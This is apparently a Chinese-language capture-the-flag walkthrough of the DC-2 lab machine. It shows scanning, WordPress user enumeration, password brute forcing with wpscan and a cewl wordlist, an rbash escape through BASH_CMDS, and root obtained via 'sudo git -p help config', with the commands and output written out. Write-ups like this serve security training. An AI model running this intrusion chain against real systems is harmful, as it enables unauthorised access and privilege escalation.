此靶机需要写入对应的dns解析:vim /etc/hosts ip 域名
信息收集:
1.存活扫描:
nmap -sn 192.168.1.1/24
└─# nmap -sn 192.168.1.1/24
MAC Address: 52:95:D3:55:6D:01 (Unknown)
Nmap scan report for 192.168.1.11 (192.168.1.11)
Host is up (0.00064s latency).
MAC Address: A0:59:50:BC:A9:49 (Intel Corporate)
Nmap scan report for dc-2 (192.168.1.12) //发现靶机ip
Host is up (0.00044s latency).
2.端口扫描:
nmap -sT -p- 192.168.1.12 -n
└─# nmap -sT -p- 192.168.1.12 -n
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-22 23:55 EST
Nmap scan report for 192.168.1.12
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
7744/tcp open raqmon-pdu
MAC Address: 00:0C:29:61:8E:31 (VMware)
3.服务扫描:
nmap -sT -sV -O --version-all -p 80,7744 192.168.1.12
这里的7744端口是ssh哦
└─# nmap -sT -sV -O --version-all -p 80,7744 192.168.1.12
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 00:0C:29:61:8E:31 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
4.web信息收集:
发现CMS是wordpress,并且发现flag1:
先使用工具进行信息收集:
whatweb http://192.168.1.12
apache版本:2.4.10
wordpress版本:4.7.10
└─# whatweb http://192.168.1.12
http://192.168.1.12 [301 Moved Permanently] Apache[2.4.10], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[192.168.1.12], RedirectLocation[http://dc-2/]
http://dc-2/ [200 OK] Apache[2.4.10], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[192.168.1.12], JQuery[1.12.4], MetaGenerator[WordPress 4.7.10], PoweredBy[WordPress], Script[text/javascript], Title[DC-2 – Just another WordPress site], UncommonHeaders[link], WordPress[4.7.10]
nikto -host 192.168.1.12
─# nikto -host 192.168.1.12
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.1.12
+ Target Hostname: 192.168.1.12
+ Target Port: 80
+ Start Time: 2024-01-22 23:58:28 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://dc-2/
+ /index.php?: Drupal Link header found with value: ARRAY(0x56271eb823b0). See: https://www.drupal.org/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login.php: Wordpress login found.
+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2024-01-22 23:59:07 (GMT-5) (39 seconds)
---------------------------------------------------------------------------
WEB:
1.后台扫描:
根据flag1的提示: 提示需要使用cewl工具,使用一个身份登录网站查看另一个flag(如果没找到,使用另外一个身份登录)。
先用dirsearch扫一下后台:dirsearch -u http://dc-2
都是后台登录界面:
2.用户名枚举:
我们利用WPscan工具枚举一下用户名:
wpscan --url http://dc-2/ --enumerate u
发现3个用户名 admin ,tom ,jerry
└─# wpscan --url http://dc-2/ --enumerate u
[+] URL: http://dc-2/ [192.168.1.12]
[+] Started: Tue Jan 23 01:44:06 2024
[i] User(s) Identified:
[+] admin //用户名1
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry //用户名2
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom //用户名3
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
3.口令爆破:
根据flag1的提示 我们用cewl生成一下 密码字典
再把 admin ,tom ,jerry用户名写进 users.dic
cewl http://dc-2/ -w pwd.dic
└─# cewl http://dc-2/ -w pwd.dic
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
┌──(root㉿kali)-[/home/kali/Desktop/dc-2]
└─# ls -la
总计 12
drwxrwxrwx 2 root root 4096 1月23日 01:52 .
drwxr-xr-x 14 kali kali 4096 1月23日 01:52 ..
-rw-r--r-- 1 root root 1689 1月23日 01:52 pwd.dic
┌──(root㉿kali)-[/home/kali/Desktop/dc-2]
└─# vim users.dic
┌──(root㉿kali)-[/home/kali/Desktop/dc-2]
└─# ls
pwd.dic users.dic
┌──(root㉿kali)-[/home/kali/Desktop/dc-2]
└─# cat users.dic
tom
jerry
admin
开始爆破:
wpscan --url http://dc-2/ -U users.dic -P pwd.dic
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
登录看看情况:
tom:
没有page页面
jerry:
这里提示如果不能利用WordPress,可以寻找另一个切入点。
4.ssh登录:
我们尝试利用7744端口是ssh登录:
ssh tom@192.168.1.12 -p 7744
发现是有限的shell rbash
└─# ssh tom@192.168.1.12 -p 7744
The authenticity of host '[192.168.1.12]:7744 ([192.168.1.12]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.1.12]:7744' (ED25519) to the list of known hosts.
tom@192.168.1.12's password:
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ compgen -c
if
then
else
elif
fi
case
esac
for
select
...
...
times
trap
true
type
typeset
ulimit
umask
unalias
unset
wait
less
scp
ls
vi
5.绕过rbash:
环境变量绕过:
BASH_CMDS[a]=/bin/sh;a //利用bash_cmds自定义一个shell
$ export PATH=$PATH:/bin/ //将/bin作为PATH环境变量导出
$ export PATH=$PATH:/usr/bin //将usr/bin作为PATH环境变量导出
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin
$ su jerry
Password:
su: Authentication failure
$ su jerry
Password:
su: Authentication failure
$ su jerry
Password:
su: Authentication failure
$ su jerry
Password:
jerry@DC-2:/home/tom$
jerry@DC-2:/home/tom$ ls
ls: cannot open directory .: Permission denied
jerry@DC-2:/home/tom$ cd ../jerry
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
jerry@DC-2:~$
6.提权:
先看看suid提权:
find / -perm -u=s -type f 2>/dev/null
jerry@DC-2:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su
最后的 flag4.txt 是提示我们用 git 的方法去提权:
jerry@DC-2:~$ sudo git -p help config
GIT-CONFIG(1) Git Manual GIT-CONFIG(1)
NAME
git-config - Get and set repository or global options
SYNOPSIS
git config [<file-option>] [type] [-z|--null] name [value [value_regex]]
git config [<file-option>] [type] --add name value
git config [<file-option>] [type] --replace-all name value [value_regex]
git config [<file-option>] [type] [-z|--null] --get name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-all name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-regexp name_regex [value_regex]
git config [<file-option>] [type] [-z|--null] --get-urlmatch name URL
git config [<file-option>] --unset name [value_regex]
git config [<file-option>] --unset-all name [value_regex]
git config [<file-option>] --rename-section old_name new_name
git config [<file-option>] --remove-section name
git config [<file-option>] [-z|--null] -l | --list
git config [<file-option>] --get-color name [default]
git config [<file-option>] --get-colorbool name [stdout-is-tty]
git config [<file-option>] -e | --edit
DESCRIPTION
You can query/set/replace/unset options with this command. The name is
actually the section and the key separated by a dot, and the value will be
escaped.
Multiple lines can be added to an option by using the --add option. If you
want to update or unset an option which can occur on multiple lines, a POSIX
regexp value_regex needs to be given. Only the existing values that match the
regexp are updated or unset. If you want to handle the lines that do not match
the regex, just prepend a single exclamation mark in front (see also the
!/bin/bash
root@DC-2:/home/jerry# whoami
root
root@DC-2:/home/jerry# cd ../../root
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.